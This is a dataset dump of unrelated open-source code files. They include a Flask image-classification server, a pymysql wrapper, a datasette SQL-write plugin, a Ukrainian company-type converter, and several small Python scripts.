{} # the dictionary\n for i in range(len(names)):\n dict_data[names[i]] = pd.read_csv(self.path + \"/\" + csv_files[i])\n\n # deal with the Non-data problem\n for i in range(len(dict_data)):\n dict_data[names[i]] = dict_data[names[i]].interpolate()\n\n # start to calculate movement\n for i in range(len(dict_data)):\n move_name = names[i] + '_move'\n dict_data[names[i]][move_name] = movement(dict_data[names[i]])\n\n self.dict_data = dict_data\n\n # obtain specify periods of volatility\n def periods_of_volatility(self):\n\n list_date = []\n\n for dt in daterange(self.start_dt, self.end_dt):\n list_date.append(dt.strftime(\"%Y-%m-%d\"))\n\n # specify date here, create specified Date data\n dataframe = pd.DataFrame({'Date': list_date})\n\n dict_data = self.dict_data\n names = self.names\n\n for i in range(len(dict_data)):\n movement = dict_data[names[i]].iloc[:, [0, -1]]\n dataframe = dataframe.merge(movement, on='Date')\n\n self.dataframe = dataframe\n","sub_path":"functions/f_movement.py","file_name":"f_movement.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621574059","text":"num = ['first', 'second', 'third']\r\ncombo = []\r\nuser_combo = []\r\ndirection = ['clockwise', 'counterclockwise', 'clockwise']\r\nfor i in num:\r\n ans = int(input('What is the {} number in the combination? '.format(i)))\r\n combo.append(ans)\r\n\r\ncorrect = False\r\nwhile not correct:\r\n print()\r\n start = 0\r\n user_combo = []\r\n for x in direction:\r\n user_ans = int(input('Turn the lock {} by how much? '.format(x)))\r\n if x == 'clockwise':\r\n user_ans = 40 - user_ans\r\n start += user_ans\r\n if x == 'counterclockwise':\r\n start += user_ans\r\n if start > 39:\r\n start - 39\r\n user_combo.append(start)\r\n print()\r\n for f in range(3):\r\n if combo[f] != user_combo[f]:\r\n print('Sorry, that sequence was incorrect')\r\n correct = False\r\n break\r\n else:\r\n print('Correct!')\r\n break\r\n","sub_path":"ComboLock.py","file_name":"ComboLock.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528326839","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom osv import fields, osv\nfrom datetime import date,datetime\nimport decimal_precision as dp\nimport ktv_helper\n\n_logger = logging.getLogger(__name__)\n\nclass res_users(osv.osv):\n '''\n extend res_users,添加权限相关设置\n NOTE 所有折扣数据都是以 100作为单位,例如 85为85折 90 为9折\n 包括以下设置: A 默认房费折扣\n B 最低房费折扣\n C 默认酒水折扣\n D 最低酒水折扣\n E 免单权限\n F 挂账权限/挂账限额\n G 优惠限额 = 折扣费用 + 免单费用\n '''\n _positions_tuple = [('saler','销售经理'),('mananger','值班经理'),('server','服务人员')]\n _inherit = 'res.users'\n\n _columns = {\n 'default_room_fee_discount' : fields.float('default_room_fee_discount',digits = (10,2),help='默认房费折扣'),\n 'min_room_fee_discount' : fields.float('min_room_fee_discount',digits = (10,2),help='最低房费折扣'),\n 'default_drinks_fee_discount' : fields.float('default_drinks_fee_discount',digits = (10,2),help='默认酒水费折扣'),\n 'min_drinks_fee_discount': fields.float('min_drinks_fee_discount',digits = (10,2),help='最低酒水费折扣'),\n 'free_power': fields.boolean('free_power',help='是否具备免单权限'),\n 'free_fee_limit': fields.float('free_fee_limt',help='单张票据免单限额'),\n 'on_credit_power': fields.boolean('on_credit_power',help='是否具备挂账权限'),\n 'on_credit_fee_limit': fields.float('on_credit_fee_limit',digits = (10,2),help='挂账限额度'),\n 'prompt_fee_limit': fields.float('prompt_fee_limit',digits = (10,2),help='优惠限额'),\n 'input_card_no_power' : fields.boolean('input_card_no_power',help='是否可手工录入卡号'),\n 'position' : fields.selection(_positions_tuple,'职务',help='职务'),\n }\n\n _defaults = {\n 'default_room_fee_discount' : 100,\n 'min_room_fee_discount' : 100,\n 'default_drinks_fee_discount' : 100, \n 'min_drinks_fee_discount' : 100,\n 'free_power' : False,\n 'free_fee_limit' : 0,\n 'on_credit_power' : False,\n 'on_credit_fee_limit' : 0,\n 'prompt_fee_limit' : 0,\n 'input_card_no_power' : False,\n }\n","sub_path":"res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"541450107","text":"import os\nfrom flask import Flask, request , render_template\nfrom werkzeug.utils import secure_filename\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport torchvision\nfrom torchvision import datasets, models, transforms\n\nimport numpy as np\nimport copy\nfrom PIL import Image\n\nfrom Private_Info import distinction_String , requestForm , openLabel , splitchar , MyModelNameLocation\n\n\napplication = Flask(__name__)\n\n\ndef spotfind(filename):\n spotfind = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n image = Image.open('./upImg/'+filename).convert('RGB')\n image = spotfind(image).unsqueeze(0).to(device)\n\n with torch.no_grad():\n outputs = myModel(image)\n _, preds = torch.max(outputs, 1)\n print('예측 결과 : ' + MyClass_Names[preds[0]])\n return galTitle_list[preds[0]] + distinction_String + galPhotographyLocation_list[preds[0]] + distinction_String + galWebImageUrl_list[preds[0]]\n\n\n\n@application.route(\"/\")\ndef hello() :\n return \"

Hello!

\"\n\n@application.route('/testupimg')\ndef hellohtml() :\n return render_template('testupimg.html')\n\n\n# 파일 업로드 처리\n@application.route('/fileUpload' , methods=['GET','POST'])\ndef upload_file():\n\n if request.method == 'POST':\n f = request.files[requestForm]\n filenames = secure_filename(f.filename)\n f.save(\"./upImg/\"+filenames)\n result = spotfind(filenames)\n\n return result\n\n\nif __name__ == \"__main__\":\n global myModel\n global MyClass_Names\n\n data = open(openLabel , encoding='UTF8')\n MyClass_Names = [str(sport) for sport in data.read().split('\\n')]\n\n galTitle_list = []\n galPhotographyLocation_list = []\n galWebImageUrl_list = []\n for i in range(len(MyClass_Names)):\n galTitle, galPhotographyLocation, galWebImageUrl = MyClass_Names[i].split(splitchar)\n galTitle_list.append(galTitle)\n galPhotographyLocation_list.append(galPhotographyLocation)\n galWebImageUrl_list.append(galWebImageUrl)\n MyClass_Names = galTitle_list\n print(\"get MyClass\")\n\n device = torch.device('cpu')\n myModel = models.resnet34(pretrained=True)\n num_features = myModel.fc.in_features\n myModel.fc = nn.Linear(num_features, out_features=41)\n myModel.load_state_dict(copy.deepcopy(torch.load(MyModelNameLocation, device)))\n myModel.eval()\n print(\"get MyModel\")\n\n application.run(host='0.0.0.0', port='80')","sub_path":"modeluse_server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588195355","text":"\n# SNOWBOY SET UP\nimport snowboydecoder\nimport sys\nimport signal\n\n# Demo code for listening two hotwords at the same time\n\ninterrupted = False\n\nclass SnowBoy(object):\n\n def __init__(self):\n pass\n \n def signal_handler(self, signal, frame):\n global interrupted\n interrupted = True\n\n def interrupt_callback(self):\n global interrupted\n return interrupted\n\n \"\"\"\n if len(sys.argv) < 6:\n print(\"Error: need to specify 5 model names\")\n print(\"Usage: python demo.py 1st.model 2nd.model ... 5.model\")\n sys.exit(-1)\n \n \n # Array of all files passed...\n models = sys.argv[1:]\n \"\"\"\n def listener(self):\n\n \n #self.models = [\"Houston.pmdl\", \"RL.pmdl\", \"GL.pmdl\", \"BL.pmdl\", \"EL.pmdl\", \"SD.pmdl\"]\n self.models = [\"Houston.pmdl\"]\n self.models.append(\"RL.pmdl\")\n self.models.append(\"GL.pmdl\")\n self.models.append(\"BL.pmdl\")\n self.models.append(\"EL.pmdl\")\n self.models.append(\"SD.pmdl\")\n \n print(\"\\n\\nMODELS: {}\\n\\n\".format(self.models));\n # capture SIGINT signal, e.g., Ctrl+C\n signal.signal(signal.SIGINT, self.signal_handler)\n \n self.sensitivity = [.5]*len(self.models)\n self.detector = snowboydecoder.HotwordDetector(self.models, sensitivity=self.sensitivity)\n\n # Lambda = N files in Command Line #Feedback audio\n self.callbacks = [lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING), # Houston\n lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG), # R\n lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING), # G\n lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG), # B\n lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG), # E.L.\n lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG)] # S.D.\n \n \n \n # main loop\n # make sure you have the same numbers of callbacks and models\n self.detector.start(detected_callback=self.callbacks,\n interrupt_check=self.interrupt_callback,\n sleep_time=0.03)\n \n self.detector.terminate()\n\n #Done\n #End of class\n\nif __name__ == '__main__':\n sb = SnowBoy()\n sb.listener()\n","sub_path":"voiceOLA/voiceOLA.py","file_name":"voiceOLA.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305578966","text":"import pymysql\n\n\nclass MySQL:\n \"\"\"\n :args [hostname, username, password, database_name]\n \"\"\"\n def __init__(self):\n self.args = ()\n self.db = pymysql.connect(*self.args)\n self.cursor = self.db.cursor()\n self.search_sql = \"SELECT {} FROM {} {} {}{}{}\"\n self.insert_sql = \"INSERT INTO {}{} VALUES {}\"\n self.create_table_sql = ''\n self.create_database_sql = ''\n\n def create_table(self):\n try:\n self.cursor.execute(self.create_table_sql)\n self.db.commit()\n print(\"table created successfully!\")\n except self.db.OperationalError:\n print(\"DataBase Disconnected\")\n except self.db.ProgrammingError:\n print(\"Fail to create table\")\n \"\"\"\n :table_structure [col1_param_name, col2_param_name, ...]\n :values [col1_param_value, col2_param_value, ...]\n \n \n when passing the values to the function, we must follow the format like following:\n \"('%s', '%s', '%s')\" % (content, link, time)\n \"\"\"\n def insert(self, table_name, table_structure, values, cursor_close=False):\n sql = self.insert_sql.format(table_name, table_structure, values)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n print(\"Succeed in storing the data into {}!\".format(table_name))\n if cursor_close is not False:\n self.db.close()\n except self.db.ProgrammingError as e:\n print(e)\n self.db.rollback()\n \"\"\"\n :param search_mode has two types.one is 'accurate' mode,which means sql\n words has 'WHERE' in it;the other is 'fuzzy' mode,which means sql\n wors has no 'WHERE' in it\n :kwargs {\n 'table_name': table_name, \n 'search_param': [table_col_param1, table_col_param2, ...],\n 'where_statement': None or 'WHERE',\n 'limit': [[table_col_param1, operator, value], joiner, [table_col_param2, operator, value], joiner, [...], ...]\n 'order_by_statement': None or 'order by',\n 'order_by_what': None or search_param\n }\n \"\"\"\n def search(self, fetch_mode='one', remove_duplicate_mode=False, **kwargs):\n search_params = kwargs['search_param']\n total_of_search_params = len(search_params)\n if total_of_search_params > 1:\n format_search_params = ','.join(search_params)\n else:\n format_search_params = search_params[0]\n\n limit = kwargs['limit']\n total_of_limit = len(limit)\n if total_of_limit > 1 and (total_of_limit % 2) == 1:\n for i in range(0, total_of_limit, 2):\n limit[i] = limit[i][0]+limit[i][1]+'\"%s\"' % limit[i][2]\n format_limit = ' '.join(limit)\n elif total_of_limit == 1:\n format_limit = limit[0][0]+limit[0][1]+\"'%s'\" % limit[0][2]\n else:\n raise Exception(\"{}\\nKeyword 'limit' is not valid\".format(kwargs))\n sql = (format_search_params, kwargs['table_name'], kwargs['where_statement'],\n format_limit, kwargs['order_by_statement'], kwargs['order_by_what'])\n format_sql = self.search_sql.format(*sql)\n# print(type(format_sql))\n try:\n self.cursor.execute(format_sql)\n if fetch_mode == 'one':\n fetch_content = self.cursor.fetchone()\n elif fetch_mode == 'all':\n fetch_content = self.cursor.fetchall()\n else:\n raise KeyError\n if remove_duplicate_mode is True:\n if fetch_content is None:\n return False\n else:\n return True\n else:\n return fetch_content\n except self.db.ProgrammingError as e:\n print(e)\n except KeyError as f:\n print(f)","sub_path":"MySQLDB/MySQL.py","file_name":"MySQL.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280813443","text":"from .transcription.aws_transcription_service import AwsTranscriptionService\nfrom .transcription.ibm_transcription_service import IbmTranscriptionService\nfrom .transcription.contract import TranscriptionContract\nfrom .core.service_contract import ServiceContract\nfrom ..common.constants import SupportedVendors, SupportedServices\n\n\nclass ServiceFactory(object):\n \"\"\"\n A factory for various services.\n \"\"\"\n\n @classmethod\n def get_transcription_service(cls, vendor) -> TranscriptionContract:\n \"\"\"\n Returns the transcription service impl as per vendor, raises error if impl can not be resolved.\n :param vendor: name of vendor. See supported vendor in constants.\n :return: TranscriptionContract\n \"\"\"\n transcription_service = None\n if vendor == SupportedVendors.Amazon.value:\n transcription_service = AwsTranscriptionService()\n if vendor == SupportedVendors.Ibm.value:\n transcription_service = IbmTranscriptionService()\n return transcription_service\n\n @classmethod\n def get_service(cls, service, vendor) -> ServiceContract:\n \"\"\"\n Returns the service contract implementation based on service name and vendor name, otherwise raises Exception.\n :param service:\n :param vendor:\n :return:\n \"\"\"\n service_obj = None\n if not service:\n raise Exception('Illegal argument: service')\n if not vendor:\n raise Exception('Illegal argument: vendor')\n if service == SupportedServices.TranscriptionService.value:\n service_obj = cls.get_transcription_service(vendor)\n return service_obj\n","sub_path":"flaskr/services/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"395551845","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 25 12:10:45 2020\r\n\r\n@author: shashidhar\r\n\"\"\"\r\ndef catlon(n):\r\n x=2*m.factorial(n)\r\n y=m.factorial(n+1)\r\n z=m.factorial(n)\r\n cat=x/(y*z)\r\nimport numpy as np\r\nimport math as m\r\ndef inc_y(x,y,n):\r\n while(y<=n):\r\n y=y+1\r\n inc_y(x,y,n)\r\n inc_x(x,y,n)\r\n print(\"({},{})\".format(x,y))\r\n print(\"\\n\")\r\ndef inc_x(x,y,n):\r\n while(x<=n):\r\n print(\"({},{})\".format(x,y))\r\n x=x+1\r\n\r\n\r\n \r\n \r\n \r\nn=int(input(\"enter the number\"))\r\ninc_y(0,0,n)\r\n\r\n\r\n\r\n","sub_path":"given_n_generate_all_possible_sequences.py","file_name":"given_n_generate_all_possible_sequences.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196403129","text":"import os\nimport socket\n\nSOCKET_FILE = './echo.socket'\n\nprint(\"Connection...\")\nif os.path.exists(SOCKET_FILE):\n client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n client.connect(SOCKET_FILE)\n print(\"Connection done.\")\n print(\"Ctrl-C to EXIT.\")\n print(\"Send 'DONE' for server Off.\")\n while True:\n try:\n x = raw_input(\"> \") # for py2 use raw_input\n if \"\" != x:\n print(\"Sent: %s\" % x)\n client.send(x.encode('utf-8'))\n if \"DONE\" == x:\n print(\"Shutdown.\")\n break\n except KeyboardInterrupt as k:\n print(\"Shutdown.\")\n break\n client.close()\nelse:\n print(\"Cant connect!\")\nprint(\"Done\")\n","sub_path":"feature/UnixSocket/Python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265625438","text":"# ******************************************************************************\n# Copyright 2017-2018 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ******************************************************************************\n\nfrom __future__ import division, print_function, unicode_literals, absolute_import\n\nfrom nlp_architect.utils.conlleval import evaluate, metrics\n\n\ndef run_conlleval(data):\n \"\"\"\n Run conlleval python script on given data stream\n\n Returns:\n A tuple of global P/R/F1\n A dict of P/R/F1 per label\n \"\"\"\n counts = evaluate(data)\n overall, by_type = metrics(counts)\n overall_scores = (100. * overall.prec, 100. * overall.rec, 100. * overall.fscore)\n\n by_type_res = {}\n for i, m in sorted(by_type.items()):\n by_type_res[i] = (100. * m.prec, 100. * m.rec, 100. * m.fscore)\n return overall_scores, by_type_res\n\n\ndef get_conll_scores(predictions, y, y_lex):\n if isinstance(predictions, list):\n predictions = predictions[-1]\n test_p = predictions\n if len(test_p.shape) > 2:\n test_p = test_p.argmax(2)\n test_y = y\n if len(test_y.shape) > 2:\n test_y = test_y.argmax(2)\n\n prediction_data = []\n for n in range(test_y.shape[0]):\n test_yval = [y_lex[i] for i in test_y[n] if i > 0]\n prediction_y = ['O'] * len(test_yval)\n for i, j in enumerate(test_p[n][-len(test_yval):]):\n if j > 0:\n prediction_y[i] = y_lex[j]\n prediction_data.append((test_yval, test_yval, prediction_y))\n\n data = []\n for s in prediction_data:\n for t, l, p in zip(*s):\n data.append('{} {} {}\\n'.format(t, l, p))\n data.append('\\n')\n return run_conlleval(data)\n","sub_path":"nlp_architect/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147225104","text":"from business_register.converter.business_converter import BusinessConverter\nfrom business_register.models.company_models import CompanyType\nfrom business_register.emails import send_new_company_type_message\n\n\nclass CompanyConverter(BusinessConverter):\n def __init__(self):\n self.COMPANY_TYPES_UK_EN = {\n 'інші організаційно-правові форми': 'other company type',\n 'товариство з обмеженою відповідальністю': 'limited trade development',\n 'виробничий кооператив': 'industrial cooperative',\n 'дочірнє підприємство': 'subsidiary undertaking',\n 'державна організація (установа, заклад)':\n 'state organization (enterprise, institution)',\n 'приватне підприємство': 'private enterprise',\n 'релігійна організація': 'religious organization',\n 'закрите акціонерне товариство': 'private company limited by shares',\n 'державне підприємство': 'state owned enterprise',\n 'відкрите акціонерне товариство': 'open joint stock market entity',\n 'громадська організація': 'non-governmental organization',\n 'обслуговуючий кооператив': 'service cooperative',\n 'колективне підприємство': 'employee-owned enterprise',\n 'комунальне підприємство': 'municipal enterprise',\n 'комунальна організація (установа, заклад)':\n 'municipal organization (enterprise, institution)',\n 'політична партія': 'political party',\n 'підприємство споживчої кооперації': 'consumers cooperative society',\n 'орган місцевого самоврядування': 'local government institution',\n 'благодійна організація': 'charitable organization',\n 'корпорація': 'corporation',\n 'іноземне підприємство': 'foreign enterprise',\n 'спільне підприємство': 'joint enterprise',\n 'асоціація': 'association',\n 'орган державної влади': 'public authority',\n 'споживче товариство': 'consumer company',\n 'фермерське господарство': 'farm enterprise',\n 'орган виконавчої влади': 'government authority',\n 'сільськогосподарський виробничий кооператив': 'agricultural production cooperative',\n 'орган самоорганізації населення': 'community council',\n 'повне товариство': 'unlimited partnership',\n 'сільськогосподарський обслуговуючий кооператив': 'agricultural service cooperative',\n \"об'єднання співвласників багатоквартирного будинку\":\n 'association of co-owners of apartment house',\n 'профспілка': 'trade union',\n 'кооперативи': 'cooperatives',\n 'селянське (фермерське) господарство': 'farm',\n \"організація (установа, заклад) об'єднання громадян\":\n 'citizens organization (enterprise, institution)',\n \"підприємство об'єднання громадян (релігійної організації,профспілки)\":\n 'citizens enterprise association (religious organization, trade unions)',\n 'приватна організація (установа, заклад)':\n 'private organization (enterprise, institution)',\n \"інші об'єднання юридичних осіб\": 'other associations of legal entities',\n 'товарна біржа': 'commodity exchange',\n 'товариство з додатковою відповідальністю': 'superadded liability company',\n 'орендне підприємство': 'rental company',\n 'кредитна спілка': 'credit union',\n 'акціонерне товариство': 'joint stock company',\n 'спілка споживчих товариств': 'community of consumer cooperatives',\n \"об'єднання громадян, профспілки, благодійні організації та інші подібні організації\":\n 'citizens` associations, trade unions, charitable and other organizations',\n 'командитне товариство': 'limited partnership',\n 'організація роботодавців': \"employers' organisation\",\n 'концерн': 'concern',\n 'відокремлені підрозділи без статусу юридичної особи': 'branches',\n 'споживчий кооператив': 'consumer cooperative',\n 'організації (установи, заклади)': 'organizations (enterprises, institutions)',\n 'підприємства': 'enterprises',\n \"об'єднання підприємств (юридичних осіб)\": 'association of enterprises',\n 'консорціум': 'consortium',\n \"спілка об'єднань громадян\": 'union of associations of citizens',\n \"філія (інший відокремлений підрозділ)\": 'branch (separate unit)',\n 'організація орендарів': 'organization of tenants',\n 'недержавний пенсійний фонд': 'private pension fund',\n 'державна акціонерна компанія (товариство)': 'state-controlled joint-stock company',\n 'господарські товариства': 'business partnership',\n 'представництво': 'agency',\n \"об'єднання профспілок\": 'trade union association',\n 'гаражний кооператив': 'garage cooperative',\n 'приватне акціонерне товариство': 'private joint-stock company',\n 'садівниче товариство': 'gardeners partnership',\n 'публічне акціонерне товариство': 'public joint-stock company',\n 'творча спілка (інша професійна організація)':\n 'creative union (professional organization)',\n 'житлово-будівельний кооператив': 'house construction cooperative',\n 'казенне підприємство': 'state-run enterprise',\n 'сімейне підприємство': 'family enterprise',\n 'організація покупців': 'consumers association',\n 'підприємець-фізична особа': 'private entrepreneur',\n 'індивідуальне підприємство': 'sole proprietorship',\n 'органи адвокатського самоврядування': \"lawyers` self-government body\",\n 'холдингова компанія': 'holding company',\n \"адвокатське об'єднання\": \"lawyers` union\",\n 'адвокатське бюро': 'law firm',\n 'судова система': 'judiciary',\n \"асоціації органів місцевого самоврядування та їх добровільні обєднання\":\n 'associations of local government bodies and their voluntary associations',\n 'кооперативний банк': 'cooperative bank',\n 'аудиторська палата україни': 'the auditors chamber of ukraine',\n 'приватна компанія з обмеженою відповідальністю': 'private limited company',\n 'благодійне товариство': 'charitable incorporated organisation',\n 'приватна компанія з відповідальністю, обмеженою гарантіями її членів':\n 'pri/ltd by guar/nsc (private, limited by guarantee, no share capital)',\n 'компанія суспільних інтересів': 'community interest company',\n 'зареєстроване товариство': 'registered society',\n 'обмежене партнерство': 'limited partnership',\n 'королівська статутна компанія': 'royal charter company',\n 'партнерство з обмеженою відповідальністю': 'limited liability partnership',\n (\"приватна компанія з відповідальністю, обмеженою гарантіями її членів з використанням 'обмеженої' пільги\"):\n (\"pri/lbg/nsc (private, limited by guarantee, no share capital, use of 'limited' exemption)\"),\n 'шотландське благодійне товариство': 'scottish charitable incorporated organisation',\n 'приватна компанія з необмеженою відповідальністю': 'private unlimited company',\n 'давно існуюча публічна компанія': 'old public company',\n 'товариство': 'private unlimited',\n 'шотландське партнерство': 'scottish partnership',\n 'інвестиційна компанія зі змінним капіталом (цінні папери)':\n 'investment company with variable capital (securities)',\n 'інвестиційна компанія зі змінним капіталом':\n 'investment company with variable capital',\n 'промислове товариство взаємного кредиту': 'industrial and provident society',\n \"інвестиційна компанія зі змінним капіталом ('парасолькова компанія')\":\n 'investment company with variable capital(umbrella)',\n ('приватна компанія з обмеженою відповідальністю згідно підрозділу 30 закону'\n ' о компаніях'):\n 'priv ltd sect. 30 (private limited company, section 30 of the companies act)',\n 'європейське публічне товариство з обмеженою відповідальністю':\n \"european public limited-liability company (se)\",\n 'перероблена/закрита': 'converted/closed',\n 'компанія з розділеними портфелями': 'protected cell company',\n 'публічна акціонерна компанія з обмеженою відповідальністю': 'public limited company',\n 'додаткова освіта та передуніверситетський коледж/коледжний корпус':\n 'further education and sixth form college corps',\n 'приватна/компанія з відповідальністю, обмеженою гарантіями її членів/без акціонерного капіталу, використання \"обмеженої\" пільги (або привілегії)':\n \"pri/lbg/nsc (private, limited by guarantee, no share capital, use of 'limited' exemption)\",\n 'публічна компанія великобританії з обмеженою відповідальністю':\n 'united kingdom societas',\n 'консорціум великобританії': 'united kingdom economic interest grouping',\n }\n self.all_ukr_company_type_dict = self.put_objects_to_dict('name', \"business_register\",\n \"CompanyType\")\n self.all_eng_company_type_dict = self.put_objects_to_dict('name_eng',\n \"business_register\",\n \"CompanyType\")\n super().__init__()\n\n def translate_company_type_name_eng(self, name_eng):\n for key, value in self.COMPANY_TYPES_UK_EN.items():\n if value == name_eng:\n return key\n return None\n\n def create_company_type(self, name, name_eng):\n company_type = CompanyType.objects.create(name=name, name_eng=name_eng)\n self.all_ukr_company_type_dict[name] = company_type\n self.all_eng_company_type_dict[name_eng] = company_type\n print(f'New company type: id={company_type.id}, name={company_type.name}, name_eng={company_type.name_eng}')\n send_new_company_type_message(company_type)\n return company_type\n\n def save_or_get_company_type(self, type_from_record, locale):\n if locale == 'uk':\n name = type_from_record.lower()\n company_type = self.all_ukr_company_type_dict.get(name)\n if not company_type:\n name_eng = self.COMPANY_TYPES_UK_EN.get(name)\n company_type = self.create_company_type(name, name_eng)\n elif locale == 'en':\n name_eng = type_from_record.lower()\n company_type = self.all_eng_company_type_dict.get(name_eng)\n if not company_type:\n name = self.translate_company_type_name_eng(name_eng)\n company_type = self.create_company_type(name, name_eng)\n else:\n raise ValueError(f'This parameter is not valid - {locale}. Should be \"uk\" or \"en\"')\n return company_type\n","sub_path":"business_register/converter/company_converters/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":14479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328463218","text":"from frankenstein.server import views, app\n\nroutes = {\n '/projects': (views.assemble_project, ['GET']),\n '/projects/': (views.download_project, ['GET']),\n '/parts': (views.view_parts, ['GET']),\n}\n\n\ndef add_routes():\n for rule, endpoint_info in routes.iteritems():\n route_name = endpoint_info[0].__name__\n app.add_url_rule(rule, route_name, view_func=endpoint_info[0], methods=endpoint_info[1])\n","sub_path":"frankenstein/server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"546061103","text":"from typing import List\n\nclass Solution:\n def matrixScore(self, A: List[List[int]]) -> int:\n row = len(A)\n col = len(A[0])\n\n\n\n #先把所有的第一位都变成1\n for i in range(row):\n if A[i][0]==0:\n for j in range(len(A[i])):\n A[i][j]=1-A[i][j]\n #后面的列,0多的就转,1多的就保留\n for i in range(1,col):\n num0 = 0\n num1 = 0\n #统计个数\n for k in range(row):\n if A[k][i]==0:\n num0 +=1\n else:\n num1 +=1\n if num1 Annotated field {}'.format(field_name))\n except Exception as E:\n pass\n ## print('Error while annotating {}: {}'.format(field_name, E))\n\n\ndef load_stats(filename, dataset = u'IBEMC'):\n Fieldstats.objects.all().delete();\n with open(filename, 'r') as csvfile:\n reader = csv.DictReader(csvfile, delimiter = '\\t')\n for row in reader:\n try:\n field_name = row['field_name']\n field_label = row['field_label']\n ep = int(row['EP']) if row['EP'] else None\n ea =int(row['EA']) if row['EA'] else None\n np =int(row['NP']) if row['NP'] else None\n na =int(row['NA']) if row['NA'] else None\n fa =int(row['FA']) if row['FA'] else None\n\n fs = Fieldstats()\n fs.dataset = dataset\n fs.field_name = field_name\n fs.field_label = field_label\n fs.ep = ep\n fs.ea = ea\n fs.np = np\n fs.na = na\n fs.fa = fa\n\n fs.save()\n\n except Exception as Ex:\n print('Error while loading field stats for {}'.format(field_name))\n print(Ex)\n\n\nclass Command(BaseCommand):\n \"\"\"Load field stats into hub database\n\n \"\"\"\n help = 'Load field stats into hub database'\n\n option_list = BaseCommand.option_list + (\n make_option(\n '--stats_file',\n dest='stats_file',\n help='File containing stats on fields.',\n ),\n )\n\n def handle(self, *args, **options):\n print('Start...')\n filename = options['stats_file']\n load_stats(filename)\n print('Done.')\n","sub_path":"ibemc/management/commands/load_fieldstats.py","file_name":"load_fieldstats.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"487514889","text":"from datasette import hookimpl\nfrom datasette.utils.asgi import Response\n\n\nasync def write(request, datasette):\n if not await datasette.permission_allowed(\n request.actor, \"datasette-write\", default=False\n ):\n return Response.html(\"Permission denied for datasette-write\", status=403)\n databases = [db for db in datasette.databases.values() if db.is_mutable]\n if request.method == \"GET\":\n return Response.html(\n await datasette.render_template(\n \"datasette_write.html\",\n {\"databases\": databases, \"sql\": request.args.get(\"sql\") or \"\"},\n request=request,\n )\n )\n elif request.method == \"POST\":\n formdata = await request.post_vars()\n database_name = formdata[\"database\"]\n sql = formdata[\"sql\"]\n try:\n database = [db for db in databases if db.name == database_name][0]\n except IndexError:\n return Response.html(\"Database not found\", status_code=404)\n\n error = None\n result = None\n message = None\n try:\n result = await database.execute_write(sql, block=True)\n if result.rowcount == -1:\n message = \"Query executed\"\n else:\n message = \"{} row{} affected\".format(\n result.rowcount, \"\" if result.rowcount == 1 else \"s\"\n )\n except Exception as e:\n error = e\n message = str(e)\n datasette.add_message(\n request, message, type=datasette.INFO if result else datasette.ERROR,\n )\n return Response.redirect(\"/-/write\")\n else:\n return Response.html(\"Bad method\", status_code=405)\n\n\n@hookimpl\ndef register_routes():\n return [\n (r\"^/-/write$\", write),\n ]\n\n\n@hookimpl\ndef permission_allowed(actor, action):\n if action == \"datasette-write\" and actor and actor.get(\"id\") == \"root\":\n return True\n","sub_path":"datasette_write/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"576223803","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nurlpatterns = [\n path('', views.register, name='register'),\n path('profile/', views.profile, name='profile'),\n path('editar/', views.editar, 